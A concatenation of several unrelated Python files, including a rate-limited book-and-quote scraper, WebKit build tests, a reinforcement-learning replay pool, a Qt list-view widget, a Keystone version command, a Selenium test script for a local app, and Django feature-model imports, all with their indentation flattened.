def book_parser(book_html, date, status):
"""
Парсит html-узел с книгой
:param book_html: html-узел с книгой
:param date: string or None - дата прочтения
:param status: string - статус книги
:return: Book or None
"""
book_data = handle_xpath(book_html, './/div/div/div[@class="brow-data"]/div')
if book_data is None:
return error_handler('book_data', book_html)
book_name = handle_xpath(book_data, './/a[contains(@class, "brow-book-name")]')
link = try_get_book_link(book_name.get("href")) # в аргументах лежит ссылка
if link is None:
return error_handler('link', book_html)
name = None if book_name is None else book_name.text
author = book_data.xpath('.//a[contains(@class, "brow-book-author")]/text()')
if len(author):
author = ', '.join(author) # в случае нескольких авторов нужно добавить запятые
rating = None
if status == 'read':
rating = handle_xpath(book_data, './/div[@class="brow-ratings"]/span/span/span/text()')
return Book(link, status, name, author, rating, date)
def get_quote_text(card):
"""
Считываем текст цитаты
:param card: html-узел с цитатой
:return: string or None
"""
item = handle_xpath(card, './/blockquote')
if item is None:
item = handle_xpath(card, './/p')
return None if item is None else format_quote_text(item.text_content())
def quote_parser(quote_html):
"""
Парсит html-узел с цитатой
:param quote_html: html-узел с читатой
:return: Quote or None
"""
card = handle_xpath(quote_html, './/div[@class="lenta-card"]')
if card is None:
return error_handler('card', quote_html)
# Просматриваем все ссылки пока не найдем те, что нам подойдут
link = None
link_book = None
for href in card.xpath('.//a'):
if link is None:
link = try_get_quote_link(href.get('href'))
if link_book is None:
link_book = try_get_book_link(href.get('href'))
text = get_quote_text(card)
# Если мы нашли "Читать дальше...", нужно дать об этом знать и обработать во внешней функции
if len(card.xpath('.//a[@class="read-more__link"]')):
text = '!!!NOT_FULL###'
book_card = handle_xpath(card, './/div[@class="lenta-card-book__wrapper"]')
book_name = handle_xpath(book_card, './/a[@class="lenta-card__book-title"]/text()')
book_author = handle_xpath(book_card, './/p[@class="lenta-card__author-wrap"]/a/text()')
if link is not None and link_book is not None and text is not None:
return Quote(link, text, Book(link_book, name=book_name, author=book_author))
if link is None or link_book is None:
return error_handler('link', quote_html)
if text is None:
return error_handler('text', quote_html)
return None
def slash_add(left, right):
return left + '/' + right
def get_books(user_href, status, page_count=math.inf, min_delay=30, max_delay=60):
"""
Возвращает список книг (классов Book)
:param user_href: string - ссылка на пользователя
:param status: string - статус книг
:param page_count: int or float - количество страниц, которые нужно обработать (по дефолту бесконечность)
:param min_delay: int - минимальное время задержки между запросами (по дефолту 30)
:param max_delay: int - максимальное время задержки между запросами (по дефолту 60)
:return: list - список классов Book
"""
books = []
href = slash_add(user_href, status)
page_idx = 1
while page_idx <= page_count:
wait_for_delay(min_delay, max_delay)
# если происходит какая-то ошибка с подключением, переходим к следующей странице
try:
page = html.fromstring(download_page(href_i(href, page_idx)))
except Exception:
continue
finally:
page_idx += 1
if is_last_page(page) or is_redirecting_page(page):
break
last_date = None
for div_book_html in page.xpath('.//div[@id="booklist"]/div'):
date = handle_xpath(div_book_html, './/h2/text()')
if date is not None:
date = date_parser(date)
if status == 'read' and date is not None:
last_date = date
else:
book = book_parser(div_book_html, last_date, status)
if book is not None:
books.append(book)
return books
def get_quotes(user_href, page_count=math.inf, min_delay=30, max_delay=60):
"""
Возвращает список цитат (классов Quote)
:param user_href: string - ссылка на пользователя
:param page_count: int or float - количество страниц, которые нужно обработать (по дефолту бесконечность)
:param min_delay: int - минимальное время задержки между запросами (по дефолту 30)
:param max_delay: int - максимальное время задержки между запросами (по дефолту 60)
:return: list - список классов Quote
"""
quotes = []
href = slash_add(user_href, 'quotes')
page_idx = 1
while page_idx <= page_count:
wait_for_delay(min_delay, max_delay)
# если происходит какая-то ошибка с подключением, переходим к следующей странице
try:
page = html.fromstring(download_page(href_i(href, page_idx)))
except Exception:
continue
finally:
page_idx += 1
if is_last_page(page) or is_redirecting_page(page):
break
for quote_html in page.xpath('.//article'):
quote = quote_parser(quote_html)
if quote is not None and quote not in quotes:
if quote.text == '!!!NOT_FULL###': # обрабатываем случай, когда показан не весь текст цитаты
wait_for_delay(min_delay, max_delay)
try: # просматриваем страницу цитаты, в случае ошибки переходим к следующей цитате
quote_page = html.fromstring(download_page(quote.link))
except Exception:
continue
quote.text = get_quote_text(handle_xpath(quote_page, './/article'))
quotes.append(quote)
return quotes
|
# Copyright (C) 2010, 2015 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import wkbuild
class ShouldBuildTest(unittest.TestCase):
_should_build_tests = [
(["ChangeLog", "Source/WebCore/ChangeLog", "Source/WebKit/ChangeLog-2011-02-11"], []),
(["Websites/bugs.webkit.org/foo", "Source/WebCore/bar"], ["*"]),
(["Websites/bugs.webkit.org/foo"], []),
(["Source/JavaScriptCore/JavaScriptCore.xcodeproj/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/JavaScriptCore/Configurations/Base.xcconfig"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/JavaScriptCore/JavaScriptCore.vcproj/foo", "Source/WebKit/win/WebKit2.vcproj", "Source/WebKitLegacy/win/WebKit.sln", "Tools/WebKitTestRunner/Configurations/WebKitTestRunnerCommon.vsprops"], ["win"]),
(["LayoutTests/platform/mac/foo", "Source/WebCore/bar"], ["*"]),
(["LayoutTests/foo"], ["*"]),
(["LayoutTests/canvas/philip/tests/size.attributes.parse.exp-expected.txt", "LayoutTests/canvas/philip/tests/size.attributes.parse.exp.html"], ["*"]),
(["LayoutTests/platform/mac-yosemite/foo"], ["mac-yosemite"]),
(["LayoutTests/platform/mac-elcapitan/foo"], ["mac-yosemite", "mac-elcapitan"]),
(["LayoutTests/platform/mac-sierra/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra"]),
(["LayoutTests/platform/mac-highsierra/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra"]),
(["LayoutTests/platform/mac-mojave/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["LayoutTests/platform/mac-catalina/foo"], ["mac-mojave", "mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["LayoutTests/platform/ios-simulator/foo"], ["ios-13", "ios-simulator-13"]),
(["LayoutTests/platform/ios-simulator-wk1/foo"], ["ios-13", "ios-simulator-13"]),
(["LayoutTests/platform/ios-simulator-wk2/foo"], ["ios-13", "ios-simulator-13"]),
(["LayoutTests/platform/wk2/Skipped"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13"]),
(["LayoutTests/platform/mac-wk2/Skipped"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["LayoutTests/platform/mac-wk1/compositing/tiling/transform-origin-tiled-expected.txt"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["LayoutTests/platform/mac/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win"]),
(["LayoutTests/platform/mac-wk2/platform/mac/editing/spelling/autocorrection-contraction-expected.txt"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["LayoutTests/platform/win-xp/foo"], ["win"]),
(["LayoutTests/platform/win-wk1/foo"], ["win"]),
(["LayoutTests/platform/win/foo"], ["win"]),
(["LayoutTests/platform/spi/cocoa/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["LayoutTests/platform/spi/cf/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/WebKitLegacy/mac/WebKit.mac.exp"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["Source/WebKitLegacy/ios/WebKit.iOS.exp"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/Dummy/foo.exp"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/WebCore/ios/foo"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/WebCore/mac/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["Source/WebCore/win/foo"], ["win"]),
(["Source/WebCore/bridge/objc/objc_class.mm"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/WebCore/platform/wx/wxcode/win/foo"], []),
(["Source/WebCore/accessibility/ios/AXObjectCacheIOS.mm"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Source/WebCore/rendering/RenderThemeMac.mm", "Source/WebCore/rendering/RenderThemeMac.h"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
(["Source/WebCore/rendering/RenderThemeIOS.mm", "Source/WebCore/rendering/RenderThemeIOS.h"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
(["Tools/BuildSlaveSupport/build.webkit.org-config/public_html/LeaksViewer/LeaksViewer.js"], []),
]
def test_should_build(self):
for files, platforms in self._should_build_tests:
# FIXME: We should test more platforms here once
# wkbuild._should_file_trigger_build is implemented for them.
for platform in ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]:
should_build = platform in platforms or "*" in platforms
self.assertEqual(wkbuild.should_build(platform, files), should_build, "%s should%s have built but did%s (files: %s)" % (platform, "" if should_build else "n't", "n't" if should_build else "", str(files)))
# FIXME: We should run this file as part of test-rm .
# Unfortunately test-rm currently requires that unittests
# be located in a directory with a valid module name.
# 'build.webkit.org-config' is not a valid module name (due to '.' and '-')
# so for now this is a stand-alone test harness.
if __name__ == '__main__':
unittest.main()
|
from gym.spaces import Dict
from .simple_replay_pool import SimpleReplayPool, Field
import numpy as np
from flatten_dict import flatten
class MultiGoalReplayPool(SimpleReplayPool):
def __init__(self,
extra_fields={},
*args,
**kwargs):
extra_fields['relabeled'] = Field(
name='relabeled',
dtype='bool',
shape=(1, ))
super().__init__(extra_fields=extra_fields, *args, **kwargs)
def add_path(self, path):
path = path.copy()
path_flat = flatten(path)
path_length = path_flat[next(iter(path_flat.keys()))].shape[0]
path.update({
'episode_index_forwards': np.arange(
path_length,
dtype=self.fields['episode_index_forwards'].dtype
)[..., None],
'episode_index_backwards': np.arange(
path_length,
dtype=self.fields['episode_index_backwards'].dtype
)[::-1, None],
'relabeled': np.array([False]*path_length)[:, None],
})
self.add_samples(path)
path = self._environment.relabel_path(path.copy())
path_flat = flatten(path)
path_length = path_flat[next(iter(path_flat.keys()))].shape[0]
path.update({
'episode_index_forwards': np.arange(
path_length,
dtype=self.fields['episode_index_forwards'].dtype
)[..., None],
'episode_index_backwards': np.arange(
path_length,
dtype=self.fields['episode_index_backwards'].dtype
)[::-1, None],
'relabeled': np.array([True]*path_length)[:, None],
})
self.add_samples(path)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains library item tree view implementation
"""
from __future__ import print_function, division, absolute_import
import logging
import traceback
from Qt.QtCore import Qt, Signal, QPoint, QRect, QSize, QMimeData
from Qt.QtWidgets import QListView, QAbstractItemView, QRubberBand
from Qt.QtGui import QFont, QColor, QPixmap, QPalette, QPainter, QBrush, QDrag
from tpDcc.libs.qt.core import contexts as qt_contexts
from tpDcc.tools.datalibrary.core import consts
from tpDcc.tools.datalibrary.widgets import mixinview
LOGGER = logging.getLogger('tpDcc-tools-datalibrary')
class ViewerListView(mixinview.ViewerViewWidgetMixin, QListView):
DEFAULT_DRAG_THRESHOLD = consts.LIST_DEFAULT_DRAG_THRESHOLD
itemMoved = Signal(object)
itemDropped = Signal(object)
itemClicked = Signal(object)
itemDoubleClicked = Signal(object)
def __init__(self, *args, **kwargs):
QListView.__init__(self, *args, **kwargs)
mixinview.ViewerViewWidgetMixin.__init__(self)
self.setSpacing(5)
self.setMouseTracking(True)
self.setSelectionRectVisible(True)
self.setViewMode(QListView.IconMode)
self.setResizeMode(QListView.Adjust)
self.setSelectionMode(QListView.ExtendedSelection)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setAcceptDrops(True)
self.setDragEnabled(True)
self.setDragDropMode(QAbstractItemView.DragDrop)
self._tree_widget = None
self._rubber_band = None
self._rubber_band_start_pos = None
self._rubber_band_color = QColor(Qt.white)
self._custom_sort_order = list()
self._drag = None
self._drag_start_pos = None
self._drag_start_index = None
self._drop_enabled = True
self.clicked.connect(self._on_index_clicked)
self.doubleClicked.connect(self._on_index_double_clicked)
# ============================================================================================================
# OVERRIDES
# ============================================================================================================
def startDrag(self, event):
"""
Overrides bae QListView startDrag function
:param event: QEvent
"""
if not self.dragEnabled():
return
if self._drag_start_pos and hasattr(event, 'pos'):
item = self.item_at(event.pos())
if item and item.drag_enabled():
self._drag_start_index = self.indexAt(event.pos())
point = self._drag_start_pos - event.pos()
dt = self.drag_threshold()
if point.x() > dt or point.y() > dt or point.x() < -dt or point.y() < -dt:
items = self.selected_items()
mime_data = self.mime_data(items)
pixmap = self._drag_pixmap(item, items)
hotspot = QPoint(pixmap.width() * 0.5, pixmap.height() * 0.5)
self._drag = QDrag(self)
self._drag.setPixmap(pixmap)
self._drag.setHotSpot(hotspot)
self._drag.setMimeData(mime_data)
self._drag.start(Qt.MoveAction)
def endDrag(self):
"""
Function that ends current drag
"""
self._drag_start_pos = None
self._drag_start_index = None
if self._drag:
del self._drag
self._drag = None
def dragEnterEvent(self, event):
"""
Overrides bae QListView dragEnterEvent function
:param event: QDragEvent
"""
mimedata = event.mimeData()
if (mimedata.hasText() or mimedata.hasUrls()) and self.drop_enabled():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
"""
Overrides bae QListView dragMoveEvent function
:param event: QDragEvent
"""
mimedata = event.mimeData()
if (mimedata.hasText() or mimedata.hasUrls()) and self.drop_enabled():
event.accept()
else:
event.ignore()
def dropEvent(self, event):
"""
Overrides bae QListView dropEvent function
:param event: QDropEvent
"""
item = self.item_at(event.pos())
selected_items = self.selected_item()
if selected_items and item:
if self.tree_widget().is_sort_by_custom_order():
self.move_items(selected_items, item)
else:
LOGGER.info('You can only re-order items when sorting by custom order')
if item:
item.drop_event(event)
self.itemDropped.emit(event)
# ============================================================================================================
# OVERRIDES - MIXIN
# ============================================================================================================
def mousePressEvent(self, event):
"""
Overrides base QListView mousePressEvent function
:param event: QMouseEvent
"""
item = self.item_at(event.pos())
if not item:
self.clearSelection()
mixinview.ViewerViewWidgetMixin.mousePressEvent(self, event)
if event.isAccepted():
QListView.mousePressEvent(self, event)
if item:
# NOTE: This causes viewer tree widget selectionChanged signal to be emitted multiple times.
# NOTE: This causes that item preview widgets are created twice when selecting an item in the viewer.
# NOTE: For this reason, we block tree widgets signals before selecting the item
with qt_contexts.block_signals(self.tree_widget()):
item.setSelected(True)
self.endDrag()
self._drag_start_pos = event.pos()
is_left_button = self.mouse_press_button() == Qt.LeftButton
is_item_draggable = item and item.drag_enabled()
is_selection_empty = not self.selected_items()
if is_left_button and (is_selection_empty or not is_item_draggable):
self.rubber_band_start_event(event)
def mouseMoveEvent(self, event):
"""
Overrides base QListView mouseMoveEvent function
:param event: QMouseEvent
"""
if not self.is_dragging_items():
is_left_button = self.mouse_press_button() == Qt.LeftButton
if is_left_button and self.rubber_band().isHidden() and self.selected_items():
self.startDrag(event)
else:
mixinview.ViewerViewWidgetMixin.mouseMoveEvent(self, event)
QListView.mouseMoveEvent(self, event)
if is_left_button:
self.rubber_band_move_event(event)
def mouseReleaseEvent(self, event):
"""
Override base QListView mouseReleaseEvent function
:param event: QMouseEvent
"""
item = self.item_at(event.pos())
items = self.selected_items()
mixinview.ViewerViewWidgetMixin.mouseReleaseEvent(self, event)
if item not in items:
if event.button() != Qt.MidButton:
QListView.mouseReleaseEvent(self, event)
elif not items:
QListView.mouseReleaseEvent(self, event)
self.endDrag()
self.rubber_band().hide()
# ============================================================================================================
# BASE
# ============================================================================================================
def scroll_to_item(self, item, pos=None):
"""
Ensures that the item is visible
:param item: LibraryItem
:param pos: QPoint or None
"""
index = self.index_from_item(item)
pos = pos or QAbstractItemView.PositionAtCenter
self.scrollTo(index, pos)
# ============================================================================================================
# TREE WIDGET
# ============================================================================================================
def tree_widget(self):
"""
Return the tree widget that contains the items
:return: LibraryTreeWidget
"""
return self._tree_widget
def set_tree_widget(self, tree_widget):
"""
Set the tree widget that contains the items
:param tree_widget: LibraryTreeWidget
"""
self._tree_widget = tree_widget
self.setModel(tree_widget.model())
self.setSelectionModel(tree_widget.selectionModel())
def items(self):
"""
Return all the items
:return: list(LibraryItem)
"""
return self.tree_widget().items()
def row_at(self, pos):
"""
Returns the row for the given pos
:param pos: QPoint
:return:
"""
return self.tree_widget().row_at(pos)
def item_at(self, pos):
"""
Returns a pointer to the item at the coordinates p
The coordinates are relative to the tree widget's viewport
:param pos: QPoint
:return: LibraryItem
"""
index = self.indexAt(pos)
return self.item_from_index(index)
def selected_item(self):
"""
Returns the last selected non-hidden item
:return: QTreeWidgetItem
"""
return self.tree_widget().selected_item()
def selected_items(self):
"""
Returns a list of all selected non-hidden items
:return: list(QTreeWidgetItem)
"""
return self.tree_widget().selectedItems()
def insert_item(self, row, item):
"""
Inserts the item at row in the top level in the view
:param row: int
:param item: QTreeWidgetItem
"""
self.tree_widget().insertTopLevelItem(row, item)
def take_items(self, items):
"""
Removes and returns the items from the view
:param items: list(QTreeWidgetItem)
:return: list(QTreeWidgetItem)
"""
for item in items:
row = self.tree_widget().indexOfTopLevelItem(item)
self.tree_widget().takeTopLevelItem(row)
return items
def set_indexes_selected(self, indexes, value):
"""
Set the selected state for the given indexes
:param indexes: list(QModelIndex)
:param value: bool
"""
items = self.items_from_indexes(indexes)
self.set_items_selected(items, value)
def set_items_selected(self, items, value):
"""
Sets the selected state for the given items
:param items: list(LibraryItem)
:param value: bool
"""
with qt_contexts.block_signals(self.tree_widget()):
try:
for item in items:
item.setSelected(value)
except Exception:
LOGGER.error(str(traceback.format_exc()))
def move_items(self, items, item_at):
"""
Moves the given items to the position at the given row
:param items: list(LibraryItem)
:param item_at: LibraryItem
"""
scroll_value = self.verticalScrollBar().value()
self.tree_widget().move_items(items, item_at)
self.itemMoved.emit(items[-1])
self.verticalScrollBar().setValue(scroll_value)
def index_from_item(self, item):
"""
Returns QModelIndex associated with the given item
:param item: LibraryItem
:return: QModelIndex
"""
return self.tree_widget().indexFromItem(item)
def item_from_index(self, index):
"""
Return a pointer to the LibraryItem associated with the given model index
:param index: QModelIndex
:return: LibraryItem
"""
return self.tree_widget().itemFromIndex(index)
def items_from_urls(self, urls):
"""
Returns items from the given URL objects
:param urls: list(QUrl)
:return: DataItem
"""
items = list()
for url in urls:
item = self.item_from_url(url)
if item:
items.append(item)
return items
def item_from_url(self, url):
"""
Returns the item from the given url object
:param url: QUrl
:return: DataItem
"""
return self.item_from_path(url.path())
def items_from_paths(self, paths):
"""
Returns the items from the given paths
:param paths: list(str)
:return: QUrl
"""
items = list()
for path in paths:
item = self.item_from_path(path)
if item:
items.append(item)
return items
def item_from_path(self, path):
"""
Returns the item from the given path
:param path: str
:return: DataItem
"""
for item in self.items():
item_path = item.url().path()
if item_path and path == item_path:
return item
return None
# ============================================================================================================
# DRAG & DROP
# ============================================================================================================
def drop_enabled(self):
"""
Returns whether drop functionality is enabled or not
:return: bool
"""
return self._drop_enabled
def set_drop_enabled(self, flag):
"""
Sets whether drop functionality is enabled or not
:param flag: bool
"""
self._drop_enabled = flag
def drag_threshold(self):
"""
Returns current drag threshold
:return: float
"""
return self.DEFAULT_DRAG_THRESHOLD
def is_dragging_items(self):
"""
Returns whether the user is currently dragging items or not
:return: bool
"""
return bool(self._drag)
def mime_data(self, items):
"""
Returns drag mime data
:param items: list(LibraryItem)
:return: QMimeData
"""
mimedata = QMimeData()
urls = [item.url() for item in items]
text = '\n'.join([item.mime_text() for item in items])
mimedata.setUrls(urls)
mimedata.setText(text)
return mimedata
# ============================================================================================================
# RUBBER BAND
# ============================================================================================================
def create_rubber_band(self):
"""
Creates a new instance of the selection rubber band
:return: QRubberBand
"""
rubber_band = QRubberBand(QRubberBand.Rectangle, self)
palette = QPalette()
color = self.rubber_band_color()
palette.setBrush(QPalette.Highlight, QBrush(color))
rubber_band.setPalette(palette)
return rubber_band
def rubber_band(self):
"""
Retursn the selection rubber band for this widget
:return: QRubberBand
"""
if not self._rubber_band:
self.setSelectionRectVisible(False)
self._rubber_band = self.create_rubber_band()
return self._rubber_band
def rubber_band_color(self):
"""
Returns the rubber band color for this widget
:return: QColor
"""
return self._rubber_band_color
def set_rubber_band_color(self, color):
"""
Sets the color for the rubber band
:param color: QColor
"""
self._rubber_band = None
self._rubber_band_color = color
def rubber_band_start_event(self, event):
"""
Triggered when the user presses an empty area
:param event: QMouseEvent
"""
self._rubber_band_start_pos = event.pos()
rect = QRect(self._rubber_band_start_pos, QSize())
rubber_band = self.rubber_band()
rubber_band.setGeometry(rect)
rubber_band.show()
def rubber_band_move_event(self, event):
"""
Triggered when the user moves the mouse over the current viewport
:param event: QMouseEvent
"""
if self.rubber_band() and self._rubber_band_start_pos:
rect = QRect(self._rubber_band_start_pos, event.pos())
rect = rect.normalized()
self.rubber_band().setGeometry(rect)
# ============================================================================================================
# INTERNAL
# ============================================================================================================
def _drag_pixmap(self, item, items):
"""
Internal function that shows the pixmap for the given item during drag operation
:param item: LibraryItem
:param items: list(LibraryItem)
:return: QPixmap
"""
rect = self.visualRect(self.index_from_item(item))
pixmap = QPixmap()
pixmap = pixmap.grabWidget(self, rect)
if len(items) > 1:
custom_width = 35
custom_padding = 5
custom_text = str(len(items))
custom_x = pixmap.rect().center().x() - float(custom_width * 0.5)
custom_y = pixmap.rect().top() + custom_padding
custom_rect = QRect(custom_x, custom_y, custom_width, custom_width)
painter = QPainter(pixmap)
painter.setRenderHint(QPainter.Antialiasing)
painter.setPen(Qt.NoPen)
painter.setBrush(self.viewer().background_selected_color())
painter.drawEllipse(custom_rect.center(), float(custom_width * 0.5), float(custom_width * 0.5))
font = QFont('Serif', 12, QFont.Light)
painter.setFont(font)
painter.setPen(self.viewer().text_selected_color())
painter.drawText(custom_rect, Qt.AlignCenter, str(custom_text))
return pixmap
# ============================================================================================================
# CALLBACKS
# ============================================================================================================
def _on_index_clicked(self, index):
"""
Callback function that is called when the user clicks on an item
:param index: QModelIndex
"""
item = self.item_from_index(index)
item.clicked()
self.set_items_selected([item], True)
self.itemClicked.emit(item)
def _on_index_double_clicked(self, index):
"""
Callback function that is called when the user double clicks on an item
:param index: QModelIndex
"""
item = self.item_from_index(index)
self.set_items_selected([item], True)
item.double_clicked()
self.itemDoubleClicked.emit(item)
|
from keystone.backends.sqlalchemy import migration
from keystone import version
from keystone.manage2 import base
from keystone.manage2 import common
from keystone.logic.types import fault
@common.arg('--api', action='store_true',
default=False,
help='only print the API version')
@common.arg('--implementation', action='store_true',
default=False,
help='only print the implementation version')
@common.arg('--database', action='store_true',
default=False,
help='only print the database version')
class Command(base.BaseSqlalchemyCommand):
"""Returns keystone version data.
Provides the latest API version, implementation version, database version,
or all of the above, if none is specified.
"""
@staticmethod
def get_api_version():
"""Returns a complete API version string"""
return ' '.join([version.API_VERSION, version.API_VERSION_STATUS])
@staticmethod
def get_implementation_version():
"""Returns a complete implementation version string"""
return version.version()
@staticmethod
def get_database_version():
"""Returns database's current migration level"""
return migration.db_version(Command._get_connection_string())
def run(self, args):
"""Process argparse args, and print results to stdout"""
show_all = not (args.api or args.implementation or args.database)
if args.api or show_all:
print 'API v%s' % Command.get_api_version()
if args.implementation or show_all:
print 'Implementation v%s' % Command.get_implementation_version()
if args.database or show_all:
try:
version_str = 'v%s' % (self.get_database_version())
except fault.DatabaseMigrationError:
version_str = 'not under version control'
print 'Database %s' % (version_str)
|
"""Unit test package for htping."""
|
from selenium import webdriver
import time
import csv
from csv import reader
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
browser = webdriver.Chrome("/usr/bin/chromedriver")
browser.get("http://localhost:1667")
browser.maximize_window()
# # ACCEPT COOKIES
browser.find_element_by_xpath('//button[2]').click()
# # LOGIN
browser.find_element_by_xpath('//*[@id="app"]/nav/div/ul/li[2]/a').click()
email = browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/fieldset[1]/input')
password = browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/fieldset[2]/input')
email.send_keys("user2@hotmail.com")
time.sleep(1)
password.send_keys("Userpass1")
time.sleep(1)
browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/button').click()
time.sleep(1)
user_name = WebDriverWait(
browser, 5).until(
EC.visibility_of_element_located((By.XPATH, '//*[@id="app"]/nav/div/ul/li[4]/a'))
)
assert user_name.text == "user2"
print(user_name.text)
time.sleep(1)
print(f"BEJELENTKEZÉS: {user_name.text}")
### DATA INPUT FROM FILE
#input_post = ["Hello", "me", "oooooooooooooooooooooooobbbbbbbbbbbbbbbbbb", "key2"]
#article_data = ["Article Title", "What's this article about?", "Write your article (in markdown)", "Enter tags"]
input_file = 'input_article.csv'
with open(input_file, 'r') as data:
csv_reader = reader(data)
# Get all rows of csv from csv_reader object as list of tuples
input_post = list(map(tuple, csv_reader))
# display all rows of csv
#print(input_post)
#print(input_post)
#print(input_post[0])
#print(input_post[1])
#print(input_post[2])
# NEW ARTICLE
new_article = browser.find_element_by_xpath('//*[@href="#/editor"]')
#new_article.click()
time.sleep(2)
#fill_article = []
post_num = len(input_post) - 1
line_num = len(input_post[0])
for i in range(1, post_num):
browser.find_element_by_xpath('//*[@href="#/editor"]').click()
print(i, input_post[i][0], input_post[i][1], input_post[i][2], input_post[i][3])
time.sleep(2)
for j in range(0, line_num):
browser.find_element_by_xpath(f'//*[@placeholder="{input_post[0][j]}"]').send_keys(input_post[i][j])
#fill_article.append(fill)
#print(i, input_post[i][0], input_post[i][1], input_post[i][2], input_post[i][3])
time.sleep(2)
# publish_btn = browser.find_element_by_xpath('//*[@id="app"]/div/div/div/div/form/button').click()
publish_btn = WebDriverWait(browser, 5).until(EC.visibility_of_element_located((By.XPATH, '//button[1]'))).click()
time.sleep(2)
# print(i, input_post[i][j])
# assert
#published_title = browser.find_element_by_xpath('//*[@class="container"]/h1')
#assert(published_title.text == input_post[0])
#print("New article published:", published_title.text)
browser.quit()
|
from __future__ import unicode_literals
import logging
import typing
from copy import deepcopy
from django.core.exceptions import (
NON_FIELD_ERRORS,
ObjectDoesNotExist,
ValidationError,
)
from django.db import models
from django.db.models import Q, UniqueConstraint
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django_lifecycle import AFTER_CREATE, BEFORE_CREATE, LifecycleModel, hook
from ordered_model.models import OrderedModelBase
from simple_history.models import HistoricalRecords
from environments.identities.helpers import (
get_hashed_percentage_for_object_ids,
)
from features.custom_lifecycle import CustomLifecycleModelMixin
from features.feature_states.models import AbstractBaseFeatureValueModel
from features.feature_types import MULTIVARIATE
from features.helpers import get_correctly_typed_value
from features.multivariate.models import MultivariateFeatureStateValue
from features.utils import (
get_boolean_from_string,
get_integer_from_string,
get_value_type,
)
from features.value_types import (
BOOLEAN,
FEATURE_STATE_VALUE_TYPES,
INTEGER,
STRING,
)
from projects.models import Project
from projects.tags.models import Tag
logger = logging.getLogger(__name__)
